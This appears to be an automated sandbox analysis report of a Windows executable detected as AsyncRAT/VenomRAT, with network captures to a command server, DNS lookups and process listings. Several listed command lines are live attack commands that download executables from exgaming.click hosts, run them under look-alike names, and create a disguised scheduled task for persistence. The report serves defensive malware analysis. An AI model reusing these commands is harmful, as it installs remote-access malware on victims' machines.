                            May 26, 2024 09:50:39.650471926 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:39.955234051 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:39.968394995 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:39.973433971 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:39.973615885 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:39.979152918 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:40.074928999 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:40.076718092 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:40.081983089 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:40.082148075 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:40.087372065 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:40.176981926 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:40.217777014 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:40.314157963 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:40.315701962 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:40.320667028 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:40.320832014 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:40.325817108 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:44.186927080 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:44.191967964 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:44.192142010 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:44.198045015 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:44.501167059 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:44.547857046 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:44.635384083 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:44.639751911 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:44.644766092 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:44.650573969 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:44.655644894 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:45.374560118 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:45.379781008 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:45.379980087 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:45.384949923 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:45.687529087 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:45.733345032 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:45.822611094 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:45.824254036 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:45.829432964 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:45.829587936 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:45.834644079 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:47.374483109 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:47.379875898 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:47.380839109 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:47.385799885 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:47.687402964 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:47.733378887 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:47.780682087 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:47.785795927 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:47.785994053 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:47.790919065 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:47.843308926 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:47.845052004 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:47.899362087 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:47.899544954 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:47.908510923 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:48.077172995 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:48.123970032 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:48.209803104 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:48.211173058 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:48.216711044 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:48.216872931 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:48.222392082 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:51.968200922 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:51.973468065 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:51.973644018 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:51.979276896 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:52.264390945 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:52.311486006 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:52.397860050 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:52.401220083 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:52.406318903 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:52.411979914 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:52.416961908 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:53.311800003 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:53.316850901 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:53.318428993 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:53.323359013 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:53.797594070 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:53.842616081 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:53.929724932 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:53.931355000 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:53.936628103 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:53.936681032 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:53.942651987 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:54.280627966 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:54.285713911 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:54.285769939 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:54.290771961 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:54.592927933 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:54.642520905 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:54.727632046 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:54.736371994 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:54.741380930 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:54.741645098 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:54.746556044 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:56.124228001 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:56.129339933 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:56.129498005 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:56.134489059 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:56.424426079 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:56.467720985 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:56.557847977 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:56.558542013 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:56.563652992 CEST44494970494.156.65.172192.168.2.5
                            May 26, 2024 09:50:56.563839912 CEST497044449192.168.2.594.156.65.172
                            May 26, 2024 09:50:56.568860054 CEST | 4449 | 49704 | 94.156.65.172 | 192.168.2.5
                            May 26, 2024 09:51:09.671355009 CEST | 49704 | 4449 | 192.168.2.5 | 94.156.65.172
                            May 26, 2024 09:51:09.676482916 CEST | 4449 | 49704 | 94.156.65.172 | 192.168.2.5
                            May 26, 2024 09:51:09.676542997 CEST | 49704 | 4449 | 192.168.2.5 | 94.156.65.172
                            May 26, 2024 09:51:09.681535006 CEST | 4449 | 49704 | 94.156.65.172 | 192.168.2.5
                            May 26, 2024 09:51:09.984875917 CEST | 4449 | 49704 | 94.156.65.172 | 192.168.2.5
                            May 26, 2024 09:51:10.030105114 CEST | 49704 | 4449 | 192.168.2.5 | 94.156.65.172
                            May 26, 2024 09:51:10.122409105 CEST | 4449 | 49704 | 94.156.65.172 | 192.168.2.5
                            May 26, 2024 09:51:10.123085976 CEST | 49704 | 4449 | 192.168.2.5 | 94.156.65.172
                            May 26, 2024 09:51:10.128628969 CEST | 4449 | 49704 | 94.156.65.172 | 192.168.2.5
                            May 26, 2024 09:51:10.128681898 CEST | 49704 | 4449 | 192.168.2.5 | 94.156.65.172
                            May 26, 2024 09:51:10.133646965 CEST | 4449 | 49704 | 94.156.65.172 | 192.168.2.5
                            May 26, 2024 09:51:23.218076944 CEST | 49704 | 4449 | 192.168.2.5 | 94.156.65.172
                            May 26, 2024 09:51:23.223354101 CEST | 4449 | 49704 | 94.156.65.172 | 192.168.2.5
                            May 26, 2024 09:51:23.223579884 CEST | 49704 | 4449 | 192.168.2.5 | 94.156.65.172
                            May 26, 2024 09:51:23.228485107 CEST | 4449 | 49704 | 94.156.65.172 | 192.168.2.5
                            May 26, 2024 09:51:23.515497923 CEST | 4449 | 49704 | 94.156.65.172 | 192.168.2.5
                            May 26, 2024 09:51:23.561427116 CEST | 49704 | 4449 | 192.168.2.5 | 94.156.65.172
                            May 26, 2024 09:51:23.649652958 CEST | 4449 | 49704 | 94.156.65.172 | 192.168.2.5
                            May 26, 2024 09:51:23.650341988 CEST | 49704 | 4449 | 192.168.2.5 | 94.156.65.172
                            May 26, 2024 09:51:23.655469894 CEST | 4449 | 49704 | 94.156.65.172 | 192.168.2.5
                            May 26, 2024 09:51:23.655533075 CEST | 49704 | 4449 | 192.168.2.5 | 94.156.65.172
                            May 26, 2024 09:51:23.660608053 CEST | 4449 | 49704 | 94.156.65.172 | 192.168.2.5
                            Timestamp | Source Port | Dest Port | Source IP | Dest IP
                            May 26, 2024 09:46:52.415560007 CEST | 60180 | 53 | 192.168.2.5 | 1.1.1.1
                            May 26, 2024 09:46:52.439146996 CEST | 53 | 60180 | 1.1.1.1 | 192.168.2.5
                            May 26, 2024 09:46:53.536192894 CEST | 63265 | 53 | 192.168.2.5 | 1.1.1.1
                            May 26, 2024 09:46:53.684042931 CEST | 53 | 63265 | 1.1.1.1 | 192.168.2.5
                            May 26, 2024 09:46:57.213036060 CEST | 56566 | 53 | 192.168.2.5 | 1.1.1.1
                            May 26, 2024 09:46:57.233531952 CEST | 53 | 56566 | 1.1.1.1 | 192.168.2.5
                            May 26, 2024 09:46:58.235673904 CEST | 60095 | 53 | 192.168.2.5 | 1.1.1.1
                            May 26, 2024 09:46:58.255074024 CEST | 53 | 60095 | 1.1.1.1 | 192.168.2.5
                            Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                            May 26, 2024 09:46:52.415560007 CEST | 192.168.2.5 | 1.1.1.1 | 0x5f11 | Standard query (0) | xcu.exgaming.click | A (IP address) | IN (0x0001) | false
                            May 26, 2024 09:46:53.536192894 CEST | 192.168.2.5 | 1.1.1.1 | 0xf0fb | Standard query (0) | xcu5.exgaming.click | A (IP address) | IN (0x0001) | false
                            May 26, 2024 09:46:57.213036060 CEST | 192.168.2.5 | 1.1.1.1 | 0x6d74 | Standard query (0) | xcu.exgaming.click | A (IP address) | IN (0x0001) | false
                            May 26, 2024 09:46:58.235673904 CEST | 192.168.2.5 | 1.1.1.1 | 0x961d | Standard query (0) | xcu5.exgaming.click | A (IP address) | IN (0x0001) | false
                            Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                            May 26, 2024 09:46:52.439146996 CEST | 1.1.1.1 | 192.168.2.5 | 0x5f11 | Name error (3) | xcu.exgaming.click | none | none | A (IP address) | IN (0x0001) | false
                            May 26, 2024 09:46:53.684042931 CEST | 1.1.1.1 | 192.168.2.5 | 0xf0fb | Name error (3) | xcu5.exgaming.click | none | none | A (IP address) | IN (0x0001) | false
                            May 26, 2024 09:46:57.233531952 CEST | 1.1.1.1 | 192.168.2.5 | 0x6d74 | Name error (3) | xcu.exgaming.click | none | none | A (IP address) | IN (0x0001) | false
                            May 26, 2024 09:46:58.255074024 CEST | 1.1.1.1 | 192.168.2.5 | 0x961d | Name error (3) | xcu5.exgaming.click | none | none | A (IP address) | IN (0x0001) | false
                            May 26, 2024 09:46:59.459609985 CEST | 1.1.1.1 | 192.168.2.5 | 0x74f1 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.214.172 | A (IP address) | IN (0x0001) | false
                            May 26, 2024 09:46:59.459609985 CEST | 1.1.1.1 | 192.168.2.5 | 0x74f1 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.210.172 | A (IP address) | IN (0x0001) | false


                            Target ID:0
                            Start time:03:46:49
                            Start date:26/05/2024
                            Path:C:\Users\user\Desktop\ZzOTKK2V8l.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Users\user\Desktop\ZzOTKK2V8l.exe"
                            Imagebase:0x600000
                            File size:76'288 bytes
                            MD5 hash:9F7B2BF836C0E9682F7F612FC60D88F9
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000000.00000000.1973127111.0000000000602000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_VenomRAT, Description: Yara detected VenomRAT, Source: 00000000.00000002.2006799224.00000000036E6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            Reputation:low
                            Has exited:true

                            Target ID:2
                            Start time:03:46:49
                            Start date:26/05/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit
                            Imagebase:0x7ff7bfdf0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:3
                            Start time:03:46:49
                            Start date:26/05/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:4
                            Start time:03:46:49
                            Start date:26/05/2024
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\user\AppData\Local\Temp\\ExpIorer.exe')
                            Imagebase:0x7ff7be880000
                            File size:452'608 bytes
                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:5
                            Start time:03:46:51
                            Start date:26/05/2024
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\user\AppData\Local\Temp\\ExplIorer.exe')
                            Imagebase:0x7ff7be880000
                            File size:452'608 bytes
                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:6
                            Start time:03:46:52
                            Start date:26/05/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "AntiMalware" /tr '"C:\Users\user\AppData\Roaming\AntiMalware.exe"' & exit
                            Imagebase:0x7ff7bfdf0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:7
                            Start time:03:46:52
                            Start date:26/05/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp124D.tmp.bat""
                            Imagebase:0x7ff7bfdf0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:8
                            Start time:03:46:52
                            Start date:26/05/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:9
                            Start time:03:46:52
                            Start date:26/05/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:10
                            Start time:03:46:52
                            Start date:26/05/2024
                            Path:C:\Windows\System32\schtasks.exe
                            Wow64 process (32bit):false
                            Commandline:schtasks /create /f /sc onlogon /rl highest /tn "AntiMalware" /tr '"C:\Users\user\AppData\Roaming\AntiMalware.exe"'
                            Imagebase:0x7ff6e4a60000
                            File size:235'008 bytes
                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:11
                            Start time:03:46:52
                            Start date:26/05/2024
                            Path:C:\Windows\System32\timeout.exe
                            Wow64 process (32bit):false
                            Commandline:timeout 3
                            Imagebase:0x7ff79c080000
                            File size:32'768 bytes
                            MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate
                            Has exited:true

                            Target ID:12
                            Start time:03:46:53
                            Start date:26/05/2024
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:powershell Start-Process -FilePath 'C:\Users\user\AppData\Local\Temp\\ExpIorer.exe'
                            Imagebase:0x7ff7be880000
                            File size:452'608 bytes
                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:13
                            Start time:03:46:53
                            Start date:26/05/2024
                            Path:C:\Users\user\AppData\Roaming\AntiMalware.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Users\user\AppData\Roaming\AntiMalware.exe
                            Imagebase:0x810000
                            File size:76'288 bytes
                            MD5 hash:9F7B2BF836C0E9682F7F612FC60D88F9
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Roaming\AntiMalware.exe, Author: Joe Security
                            • Rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice, Description: Detects executables attemping to enumerate video devices using WMI, Source: C:\Users\user\AppData\Roaming\AntiMalware.exe, Author: ditekSHen
                            Antivirus matches:
                            • Detection: 100%, Avira
                            • Detection: 100%, Joe Sandbox ML
                            • Detection: 50%, ReversingLabs
                            • Detection: 55%, Virustotal, Browse
                            Reputation:low
                            Has exited:true

                            Target ID:14
                            Start time:03:46:54
                            Start date:26/05/2024
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:powershell Start-Process -FilePath 'C:\Users\user\AppData\Local\Temp\\ExplIorer.exe'
                            Imagebase:0x7ff7be880000
                            File size:452'608 bytes
                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:15
                            Start time:03:46:54
                            Start date:26/05/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit
                            Imagebase:0x7ff7bfdf0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:16
                            Start time:03:46:54
                            Start date:26/05/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:17
                            Start time:03:46:54
                            Start date:26/05/2024
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\user\AppData\Local\Temp\\ExpIorer.exe')
                            Imagebase:0x7ff7be880000
                            File size:452'608 bytes
                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:18
                            Start time:03:46:55
                            Start date:26/05/2024
                            Path:C:\Users\user\AppData\Roaming\AntiMalware.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Users\user\AppData\Roaming\AntiMalware.exe"
                            Imagebase:0x7b0000
                            File size:76'288 bytes
                            MD5 hash:9F7B2BF836C0E9682F7F612FC60D88F9
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:false

                            Target ID:19
                            Start time:03:46:55
                            Start date:26/05/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit
                            Imagebase:0x7ff7bfdf0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:20
                            Start time:03:46:55
                            Start date:26/05/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:21
                            Start time:03:46:55
                            Start date:26/05/2024
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\user\AppData\Local\Temp\\ExpIorer.exe')
                            Imagebase:0x7ff7be880000
                            File size:452'608 bytes
                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:22
                            Start time:03:46:56
                            Start date:26/05/2024
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\user\AppData\Local\Temp\\ExplIorer.exe')
                            Imagebase:0x7ff7be880000
                            File size:452'608 bytes
                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:23
                            Start time:03:46:57
                            Start date:26/05/2024
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:powershell Start-Process -FilePath 'C:\Users\user\AppData\Local\Temp\\ExpIorer.exe'
                            Imagebase:0x7ff7be880000
                            File size:452'608 bytes
                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:24
                            Start time:03:46:58
                            Start date:26/05/2024
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:powershell Start-Process -FilePath 'C:\Users\user\AppData\Local\Temp\\ExplIorer.exe'
                            Imagebase:0x7ff7be880000
                            File size:452'608 bytes
                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:25
                            Start time:03:46:59
                            Start date:26/05/2024
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\user\AppData\Local\Temp\\ExplIorer.exe')
                            Imagebase:0x7ff7be880000
                            File size:452'608 bytes
                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:26
                            Start time:03:47:01
                            Start date:26/05/2024
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:powershell Start-Process -FilePath 'C:\Users\user\AppData\Local\Temp\\ExpIorer.exe'
                            Imagebase:0x7ff7be880000
                            File size:452'608 bytes
                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:27
                            Start time:03:47:02
                            Start date:26/05/2024
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:powershell Start-Process -FilePath 'C:\Users\user\AppData\Local\Temp\\ExplIorer.exe'
                            Imagebase:0x7ff7be880000
                            File size:452'608 bytes
                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true


                              Execution Graph

                              Execution Coverage:24.5%
                              Dynamic/Decrypted Code Coverage:100%
                              Signature Coverage:100%
                              Total number of Nodes:5
                              Total number of Limit Nodes:1
                              execution_graph (node id: address, API called at that node)
                              • 1948: 7ff848f43dce
                              • 1950: 7ff848f43dff
                              • 1949: 7ff848f43f6b
                              • 1951: 7ff848f440f4 NtProtectVirtualMemory
                              • 1952: 7ff848f44135
                              • Edges: 1948->1950, 1950->1949, 1950->1951, 1951->1952

